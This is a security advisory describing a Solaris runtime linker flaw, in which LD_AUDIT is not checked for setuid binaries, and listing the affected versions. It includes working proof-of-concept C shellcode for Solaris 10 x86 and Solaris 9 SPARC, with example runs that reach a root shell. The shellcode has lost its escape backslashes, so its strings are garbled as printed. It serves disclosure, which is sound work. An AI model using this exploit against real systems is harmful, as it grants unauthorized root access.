‘Solaris Runtime Linker Security Vulnerability’

Summary

Solaris’s runtime linker fails to check the value of an environment variable allowing a local attacker to gain root privileges.’

Credit:

‘The information has been provided by Przemyslaw Frasunek.’


Details

Vulnerable Systems:
SPARC and x86 Platform:
 * Solaris 8 with patches 109147-31 through 109147-36
 * Solaris 9 with patches 112963-16 through 112963-19
 * Solaris 10

Immune Systems:
 * Solaris 7 is not affected by this issue.

ld.so in Solaris 9 and 10 doesn’t check the length of LD_AUDIT environment variable when running s[ug]id binaries, allowing an attacker to run arbitrary code with elevated privileges.

Proof of Concept Code:
Solaris 10 (AMD64):
//dupa.c
static char sh[] =
‘x31xc0xebx09x5ax89x42x01x88x42x06xeb’
‘x0dxe8xf2xffxffxffx9ax01x01x01x01x07x01’
‘xc3x50xb0x17xe8xf0xffxffxffx31xc0x68x2f’
‘x73x68x5fx68x2fx62x69x6ex88x44x24x07’
‘x89xe3x50x53x8dx0cx24x8dx54x24x04x52’
‘x51x53xb0x0bxe8xcbxffxffxff’;

int la_version() {
        void (*f)();
        f = (void*)sh;
        f();
        return 3;
}

Example Run:
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(staff)

Solaris 9 on SPARC:
//dupa.c
char sh[] =
/* setuid() */
‘x90x08x3fxffx82x10x20x17x91xd0x20x08’
/* execve() */
‘x20xbfxffxffx20xbfxffxffx7fxffxffxffx90x03xe0x20’
‘x92x02x20x10xc0x22x20x08xd0x22x20x10xc0x22x20x14’
‘x82x10x20x0bx91xd0x20x08/bin/ksh’;

int la_version() {
        void (*f)();
        f = (void*)sh;
        f();
        return 3;
}

Example Run:
$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ export LD_AUDIT=/tmp/dupa.so
$ ping
# id
uid=0(root) gid=100(student)

Vendor Status:
Sun has released an advisory that addresses the issue. For more details see: http://sunsolve.sun.com/search/document.do?assetkey=1-26-101794-1

Categories: UNIX